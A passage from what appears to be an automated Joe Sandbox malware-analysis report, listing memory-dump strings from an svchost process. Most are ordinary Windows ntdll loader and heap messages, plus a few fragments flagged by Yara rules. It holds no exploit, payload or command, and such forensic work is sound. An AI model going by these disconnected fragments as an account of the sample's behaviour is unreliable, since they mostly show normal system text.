                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-2160512332
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim engine DLL$LdrpGetShimEngineInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_InitializeEngine$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-3089669407
                                                                                                                      Strings
                                                                                                                      • Invalid debug info address of this critical section, xrefs: 033A54B6
                                                                                                                      • corrupted critical section, xrefs: 033A54C2
                                                                                                                      • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 033A540A, 033A5496, 033A5519
                                                                                                                      • double initialized or corrupted critical section, xrefs: 033A5508
                                                                                                                      • Thread is in a state in which it cannot own a critical section, xrefs: 033A5543
                                                                                                                      • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 033A54E2
                                                                                                                      • Critical section debug info address, xrefs: 033A541F, 033A552E
                                                                                                                      • 8, xrefs: 033A52E3
                                                                                                                      • Critical section address., xrefs: 033A5502
                                                                                                                      • Critical section address, xrefs: 033A5425, 033A54BC, 033A5534
                                                                                                                      • undeleted critical section in freed memory, xrefs: 033A542B
                                                                                                                      • Address of the debug info found in the active list., xrefs: 033A54AE, 033A54FA
                                                                                                                      • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 033A54CE
                                                                                                                      • Thread identifier, xrefs: 033A553A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                      • API String ID: 0-2368682639
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                                                                                                                      • API String ID: 0-360209818
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                                                      • API String ID: 0-3591852110
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                                                      • API String ID: 0-3197712848
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                                                      • API String ID: 0-3532704233
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                                                                      • API String ID: 0-1357697941
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                                                                      • API String ID: 0-3063724069
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                      • API String ID: 0-1700792311
                                                                                                                      Strings
                                                                                                                      • @, xrefs: 0332D2AF
                                                                                                                      • Control Panel\Desktop\LanguageConfiguration, xrefs: 0332D196
                                                                                                                      • @, xrefs: 0332D0FD
                                                                                                                      • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0332D262
                                                                                                                      • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0332D146
                                                                                                                      • @, xrefs: 0332D313
                                                                                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0332D2C3
                                                                                                                      • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0332D0CF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                                                                      • API String ID: 0-1356375266
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI$MZER
                                                                                                                      • API String ID: 0-664215390
                                                                                                                      Strings
                                                                                                                      • Internal error check failed, xrefs: 03397718, 033978A9
                                                                                                                      • @, xrefs: 03349EE7
                                                                                                                      • !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT), xrefs: 03397709
                                                                                                                      • sxsisol_SearchActCtxForDllName, xrefs: 033976DD
                                                                                                                      • [%x.%x] SXS: %s - Relative redirection plus env var expansion., xrefs: 033976EE
                                                                                                                      • Status != STATUS_NOT_FOUND, xrefs: 0339789A
                                                                                                                      • minkernel\ntdll\sxsisol.cpp, xrefs: 03397713, 033978A4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)$@$Internal error check failed$Status != STATUS_NOT_FOUND$[%x.%x] SXS: %s - Relative redirection plus env var expansion.$minkernel\ntdll\sxsisol.cpp$sxsisol_SearchActCtxForDllName
                                                                                                                      • API String ID: 0-761764676
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                      • API String ID: 0-1109411897
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                      • API String ID: 0-523794902
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                                      • API String ID: 0-122214566
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-792281065
                                                                                                                      Strings
                                                                                                                      • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 033A219F
                                                                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 033A2178
                                                                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 033A2180
                                                                                                                      • SXS: %s() passed the empty activation context, xrefs: 033A2165
                                                                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 033A21BF
                                                                                                                      • RtlGetAssemblyStorageRoot, xrefs: 033A2160, 033A219A, 033A21BA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                      • API String ID: 0-861424205
                                                                                                                      Strings
                                                                                                                      • Unable to build import redirection Table, Status = 0x%x, xrefs: 033A81E5
                                                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 033A8181, 033A81F5
                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0336C6C3
                                                                                                                      • LdrpInitializeImportRedirection, xrefs: 033A8177, 033A81EB
                                                                                                                      • Loading import redirection DLL: '%wZ', xrefs: 033A8170
                                                                                                                      • LdrpInitializeProcess, xrefs: 0336C6C4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                      • API String ID: 0-475462383
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$AVRF: Verifier .dlls must not have thread locals$KnownDllPath$L$\KnownDlls32
                                                                                                                      • API String ID: 0-3127649145
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                                                                                      • API String ID: 0-3393094623
                                                                                                                      Strings
                                                                                                                      • Kernel-MUI-Language-Disallowed, xrefs: 03355352
                                                                                                                      • Kernel-MUI-Language-SKU, xrefs: 0335542B
                                                                                                                      • WindowsExcludedProcs, xrefs: 0335522A
                                                                                                                      • Kernel-MUI-Number-Allowed, xrefs: 03355247
                                                                                                                      • Kernel-MUI-Language-Allowed, xrefs: 0335527B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                      • API String ID: 0-258546922
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                                                                      • API String ID: 0-2518169356
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-1975516107
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                                                      • API String ID: 0-3061284088
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                      • API String ID: 0-3178619729
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                                                                                      • API String ID: 0-3570731704
                                                                                                                      Strings
                                                                                                                      • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 03397D03
                                                                                                                      • SsHd, xrefs: 0334A885
                                                                                                                      • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 03397D56
                                                                                                                      • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 03397D39
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                                                                                                      • API String ID: 0-2905229100
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                      • API String ID: 0-3178619729
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                      • API String ID: 0-379654539
                                                                                                                      Strings
                                                                                                                      • HEAP: , xrefs: 033954E0, 033955A1
                                                                                                                      • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 033954ED
                                                                                                                      • HEAP[%wZ]: , xrefs: 033954D1, 03395592
                                                                                                                      • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 033955AE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                                                      • API String ID: 0-1657114761
                                                                                                                      Strings
                                                                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 033A22B6
                                                                                                                      • SXS: %s() passed the empty activation context, xrefs: 033A21DE
                                                                                                                      • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 033A21D9, 033A22B1
                                                                                                                      • .Local, xrefs: 033628D8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                      • API String ID: 0-1239276146
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                                                      • API String ID: 0-2586055223
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: /-Z6$Z6$gfff$yxxx
                                                                                                                      • API String ID: 0-2134535016
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Se$gfff$gfff$sHM
                                                                                                                      • API String ID: 0-1194513651
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: /-Z6$Z6$gfff$yxxx
                                                                                                                      • API String ID: 0-2134535016
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                                                      • API String ID: 0-336120773
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
